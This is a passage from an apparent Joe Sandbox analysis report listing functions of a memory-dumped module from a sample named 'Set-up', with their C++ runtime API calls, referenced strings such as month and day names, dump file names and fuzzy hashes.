                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC16AA3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow
                                                                                              • String ID: pAgents
                                                                                              • API String ID: 754070855-1392246958
                                                                                              • Opcode ID: a0576214d84b510a6eddb144f0560893d8e13bf0bf073af5ce34cc6a1a07e6d4
                                                                                              • Instruction ID: 7fbb8f28056f23a894a66d4fe0b554d86e371c13247d0244dfd910291b0e1558
                                                                                              • Opcode Fuzzy Hash: a0576214d84b510a6eddb144f0560893d8e13bf0bf073af5ce34cc6a1a07e6d4
                                                                                              • Instruction Fuzzy Hash: 47515A7151C7859FC720CF68C484A9ABBE4FFC9315F40492DF899A7250E778AA04DBA2
                                                                                              Function 6BC16B8B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC16BEF
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC16C07
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100 ref: 6BC16CCD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow
                                                                                              • String ID: pAgents
                                                                                              • API String ID: 754070855-1392246958
                                                                                              • Opcode ID: eeb68832025943576ae321d27b485e27b7f80f085869dcc051dda3507f5adbe4
                                                                                              • Instruction ID: 71b9e493ed7328b2889b9605b7de5df2d348658c116d05f21eb54058f980e83b
                                                                                              • Opcode Fuzzy Hash: eeb68832025943576ae321d27b485e27b7f80f085869dcc051dda3507f5adbe4
                                                                                              • Instruction Fuzzy Hash: D5413D7551C785DFC721CF24C845B9BBBE4FB89314F000A2DE899A7250EB38A704DBA2
                                                                                              Function 6BC3BE1B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Stoullx_errnoisspace
                                                                                              • String ID: -
                                                                                              • API String ID: 244305864-2547889144
                                                                                              • Opcode ID: 7fbd1253ad180dfa7a369f74b0dcfa9b21c4af549f5e77040a5b564677d7923f
                                                                                              • Instruction ID: 24bfb9b2b33171ba0f656267167282d34400c91e4767bbc2c7bbad1a496227ea
                                                                                              • Opcode Fuzzy Hash: 7fbd1253ad180dfa7a369f74b0dcfa9b21c4af549f5e77040a5b564677d7923f
                                                                                              • Instruction Fuzzy Hash: 93214D30A259B5DFDB109EADC4407997B65EF46770F90419AFA6487280F7BCCB40C761
                                                                                              Function 6BC18B5E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0invalid_link_target@Concurrency@@QAE@PBD@Z.MSVCR100(_Link), ref: 6BC18B84
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8B8), ref: 6BC18B93
                                                                                              • ??_V@YAXPAX@Z.MSVCR100(00000000), ref: 6BC18C08
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_link_target@Concurrency@@ExceptionThrow
                                                                                              • String ID: _Link
                                                                                              • API String ID: 3916662256-3418048212
                                                                                              • Opcode ID: 3d127d508bd21352c48862ff7eb5193884ce8d5c243d780351aedbf40ed72fbc
                                                                                              • Instruction ID: f2a89eb1dba44f166b1e655b0f0e85ee05f65d40d1ea9a5bfa04b03da6a12a03
                                                                                              • Opcode Fuzzy Hash: 3d127d508bd21352c48862ff7eb5193884ce8d5c243d780351aedbf40ed72fbc
                                                                                              • Instruction Fuzzy Hash: 9B219E746287018FD724CF29C890C6AB7F2FB85310310CD6DD5ABA7690EB34F645CA00
                                                                                              Function 6BC2FB33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,00000017,?), ref: 6BC2FB54
                                                                                                • Part of subcall function 6BC29AC7: _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC29BEB
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,0000003B,?), ref: 6BC2FB90
                                                                                                • Part of subcall function 6BC248B1: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,6BC24964,?,?,00000000,?,6BC29830,?,?,?,?,?,00000014), ref: 6BC248BC
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000000,0000003B,?), ref: 6BC2FBCD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$V?$istreambuf_iterator@$D@std@@@2@0D@std@@@std@@@std@@Getint@?$time_get@$?sgetc@?$basic_streambuf@D@std@@@std@@Stolx
                                                                                              • String ID: :
                                                                                              • API String ID: 2585351434-336475711
                                                                                              • Opcode ID: f7dc4c40636725380f1133b6409fd6f2f6dad071394a1f513426058e7d9ad986
                                                                                              • Instruction ID: 41e671a59b38caf8c96da7efddd0d18d2de3ea84d9dd7250ea3fec03c0baacf7
                                                                                              • Opcode Fuzzy Hash: f7dc4c40636725380f1133b6409fd6f2f6dad071394a1f513426058e7d9ad986
                                                                                              • Instruction Fuzzy Hash: BD2166B642424DBFEB15CF64C8A28DA7BACEF24354F0044AAF98586000F774AB14CB61
                                                                                              Function 6BC3BBB9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • isspace.MSVCR100 ref: 6BC3BBDC
                                                                                              • _Stoulx.MSVCP100(?,?,?,?,6BC29BF0,?,?,0000000A,?,?,?,?), ref: 6BC3BC00
                                                                                              • _errno.MSVCR100 ref: 6BC3BC38
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Stoulx_errnoisspace
                                                                                              • String ID: -
                                                                                              • API String ID: 2785182-2547889144
                                                                                              • Opcode ID: eba88d748c57f8c6d1e4e18ac9e735929e5ae927eb49881d689c89d097473bf7
                                                                                              • Instruction ID: 4f106ea57a8650f8097ab03f7534d1a8aef1f2bb5a1751a69be6bbce3862d9b1
                                                                                              • Opcode Fuzzy Hash: eba88d748c57f8c6d1e4e18ac9e735929e5ae927eb49881d689c89d097473bf7
                                                                                              • Instruction Fuzzy Hash: B9215B71915A79EBDF218E99D894B493F64EF46364F984085ECC487240EA3CDB4187A1
                                                                                              Function 6BC18126 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(async_send called without registering a callback), ref: 6BC1813F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC1814E
                                                                                              • ?ScheduleTask@CurrentScheduler@Concurrency@@SAXP6AXPAX@Z0@Z.MSVCR100(6BC18D4F), ref: 6BC181CC
                                                                                              Strings
                                                                                              • async_send called without registering a callback, xrefs: 6BC18137
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$??0invalid_operation@CurrentExceptionScheduleScheduler@Task@Throw
                                                                                              • String ID: async_send called without registering a callback
                                                                                              • API String ID: 1432483296-1686835759
                                                                                              • Opcode ID: 4c985a623c62fafaab5aa6e3443bdb12a6d6efd8dc3c630de444d76660ead60e
                                                                                              • Instruction ID: b0e98808cc94c0e6554cbe1761cf85fd35dc440dcc8fe9d47e7c16f92f67e320
                                                                                              • Opcode Fuzzy Hash: 4c985a623c62fafaab5aa6e3443bdb12a6d6efd8dc3c630de444d76660ead60e
                                                                                              • Instruction Fuzzy Hash: BF21A13262D204DFDB08DF58C885E9977B4FF46325F2440ADE916AB195EB38DE01DA60
                                                                                              Function 6BC1A36A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC1A371
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000034,6BC19295,?,?), ref: 6BC1A391
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1A3A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionH_prolog3_Throw
                                                                                              • String ID: _PSource
                                                                                              • API String ID: 1533905105-588581970
                                                                                              • Opcode ID: b46098e8aca2a42ab7a74861bc1d811234dad00292875e144809cfb108a3ec48
                                                                                              • Instruction ID: b8140f762042515d9103e579565469aee0a4b4ff4da7555ff6d1e9632ec65eac
                                                                                              • Opcode Fuzzy Hash: b46098e8aca2a42ab7a74861bc1d811234dad00292875e144809cfb108a3ec48
                                                                                              • Instruction Fuzzy Hash: 9C11C675911219EBCB00DFA8C985BDDFBB4BF48354F508116E524B7250E738AB45DFA0
                                                                                              Function 6BC1AC1F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC1AC3E
                                                                                              • _CxxThrowException.MSVCR100(00000000,6BC4C928), ref: 6BC1AC54
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AC6B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0bad_target@??0exception@std@@Concurrency@@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 3229365802-988830941
                                                                                              • Opcode ID: 5cf8e969528eab1b1ce2d8ef03633a1b68e4ddef2920f2755366330741814e99
                                                                                              • Instruction ID: 1763d7ad93b51c200373dcb28002507753bb86057ef8610323f2f87180d8001d
                                                                                              • Opcode Fuzzy Hash: 5cf8e969528eab1b1ce2d8ef03633a1b68e4ddef2920f2755366330741814e99
                                                                                              • Instruction Fuzzy Hash: 44014635914108EBCF00DF94C448ACDBBB8FF55324B00809AF962A6220EB399708DF50
                                                                                              Function 6BC1AFE2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(6BC123E8), ref: 6BC1AFFE
                                                                                              • _CxxThrowException.MSVCR100(00000000,6BC4C848), ref: 6BC1B014
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 2684170311-3961265847
                                                                                              • Opcode ID: 9133d0369f47e7fa5f9571c95af4bda39df364e13c71545781c0e689c72a6b3a
                                                                                              • Instruction ID: 39d9712a8e593869abed851a0ba1ce999aa1703059b37b6c3a701d946e4ee709
                                                                                              • Opcode Fuzzy Hash: 9133d0369f47e7fa5f9571c95af4bda39df364e13c71545781c0e689c72a6b3a
                                                                                              • Instruction Fuzzy Hash: 1DF0307582820CAACB00DF95D4457CD7B78EB51345F40C166A515EA100F77C8388DF91
                                                                                              Function 6BC1B90F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _Getmonths.MSVCR100 ref: 6BC1B915
                                                                                              • ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B925
                                                                                                • Part of subcall function 6BC1D90B: free.MSVCR100 ref: 6BC1D922
                                                                                                • Part of subcall function 6BC1D90B: malloc.MSVCR100 ref: 6BC1D944
                                                                                                • Part of subcall function 6BC1D90B: memcpy.MSVCR100(00000000,?,?,6BC3B700,00000000,?,6BC1B6E1,?,?,00000000,00000010), ref: 6BC1D954
                                                                                              • free.MSVCR100 ref: 6BC1B92B
                                                                                              Strings
                                                                                              • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 6BC1B93B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$??4?$_D@std@@GetmonthsV01@Yarn@mallocmemcpy
                                                                                              • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                              • API String ID: 865066547-4232081075
                                                                                              • Opcode ID: 2d16e5a849508403f1f8f206f6e225e520bf0c8ecaa0d3d0a1be68674fb38ef3
                                                                                              • Instruction ID: 299608cc9c2831f7b1d1a2661aa6d477d860225c66c5672e7428e121af8ebbea
                                                                                              • Opcode Fuzzy Hash: 2d16e5a849508403f1f8f206f6e225e520bf0c8ecaa0d3d0a1be68674fb38ef3
                                                                                              • Instruction Fuzzy Hash: ACE0C2375095204743225A2EA40485B6774DEC6A713064459F825F7300EF28DE0395A0
                                                                                              Function 6BC1B8D6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _Getdays.MSVCR100 ref: 6BC1B8DC
                                                                                              • ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000), ref: 6BC1B8EC
                                                                                                • Part of subcall function 6BC1D90B: free.MSVCR100 ref: 6BC1D922
                                                                                                • Part of subcall function 6BC1D90B: malloc.MSVCR100 ref: 6BC1D944
                                                                                                • Part of subcall function 6BC1D90B: memcpy.MSVCR100(00000000,?,?,6BC3B700,00000000,?,6BC1B6E1,?,?,00000000,00000010), ref: 6BC1D954
                                                                                              • free.MSVCR100 ref: 6BC1B8F2
                                                                                              Strings
                                                                                              • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 6BC1B902
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: free$??4?$_D@std@@GetdaysV01@Yarn@mallocmemcpy
                                                                                              • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                              • API String ID: 678222246-3283725177
                                                                                              • Opcode ID: 5e8b11dfb71008d98033e2cd8a4f24234a9d4a643f70775438f17fce75b3ac42
                                                                                              • Instruction ID: 899287900f55d559bf1945b64ce456c2335906ac620656debf370aeb2b9fe74b
                                                                                              • Opcode Fuzzy Hash: 5e8b11dfb71008d98033e2cd8a4f24234a9d4a643f70775438f17fce75b3ac42
                                                                                              • Instruction Fuzzy Hash: 2AE0C23B5195204347224A1EA51885B6B78AAC6E71312005DF865F7300EF2CDE0395A0
                                                                                              Function 6BC18216 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1821D
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links,00000010,6BC1901B,00000000,6BC184D0,00000001,00000004,6BC183CE), ref: 6BC18242
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC18251
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC1823A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionH_prolog3Throw
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1654019315-1123019286
                                                                                              • Opcode ID: 42d820a62bb1343f51d5c0f6f3456dfc09e7ff07ee9f67e12c701d7837d6d6c0
                                                                                              • Instruction ID: b7acae908fbc95cfffebba9a4cd59dc86e3f23a10b471d8f69bcc18b3f884d03
                                                                                              • Opcode Fuzzy Hash: 42d820a62bb1343f51d5c0f6f3456dfc09e7ff07ee9f67e12c701d7837d6d6c0
                                                                                              • Instruction Fuzzy Hash: FFE0DFB5C3810887DB249FF08822BADB6786F91305F800876E554B6180FBBC8700A7B0
                                                                                              Function 6BC1F91E Relevance: 6.3, APIs: 5, Instructions: 89COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F981
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F994
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F9A0
                                                                                              • memcpy.MSVCR100(?,?,0000000C), ref: 6BC1F9A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3510742995-0
                                                                                              • Opcode ID: 35f2bf4aec2fc073a671c564ee71c53efc0361904fdd81e06a92914df46b17c6
                                                                                              • Instruction ID: d33e02fe429f99852ba51a97f9ed323c8ce66bdcaffe6822251c88871c9fb99d
                                                                                              • Opcode Fuzzy Hash: 35f2bf4aec2fc073a671c564ee71c53efc0361904fdd81e06a92914df46b17c6
                                                                                              • Instruction Fuzzy Hash: A6316DB5A14706AFC710DF69C98195AB7F8BF19304B10062AE855E3600E734FA48CBE1
                                                                                              Function 6BC21A90 Relevance: 6.1, APIs: 4, Instructions: 142COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC21A97
                                                                                              • fgetc.MSVCR100 ref: 6BC21BAE
                                                                                                • Part of subcall function 6BC21926: ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long), ref: 6BC21943
                                                                                              • memcpy_s.MSVCR100 ref: 6BC21B7D
                                                                                              • ungetc.MSVCR100 ref: 6BC21BF2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_Xlength_error@std@@fgetcmemcpy_sungetc
                                                                                              • String ID:
                                                                                              • API String ID: 3822885246-0
                                                                                              • Opcode ID: 0d14e3dfd7372cb197534cd167508065344d8556ea9b51647d6fce21add508bf
                                                                                              • Instruction ID: 1be3a9270a04a67323e5e2bcbd5979fea1d0349f81b47f8959d592e25d8f19f0
                                                                                              • Opcode Fuzzy Hash: 0d14e3dfd7372cb197534cd167508065344d8556ea9b51647d6fce21add508bf
                                                                                              • Instruction Fuzzy Hash: D25161B9D24629DFDB14CFBCC4818DEB7B4FF09714B50456AE552A3240F73AAA44CB60
                                                                                              Function 6BC23E83 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC23E8A
                                                                                              • ?getloc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000014), ref: 6BC23F60
                                                                                                • Part of subcall function 6BC22533: std::locale::facet::_Incref.LIBCPMT ref: 6BC22548
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,00000000,00000014), ref: 6BC23F70
                                                                                                • Part of subcall function 6BC22591: __EH_prolog3.LIBCMT ref: 6BC22598
                                                                                                • Part of subcall function 6BC22591: std::locale::facet::_Incref.LIBCPMT(?,?,?,?,00000004), ref: 6BC225B1
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?pubimbue@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP100(?,?,00000014), ref: 6BC23F8B
                                                                                              Memory Dump Source
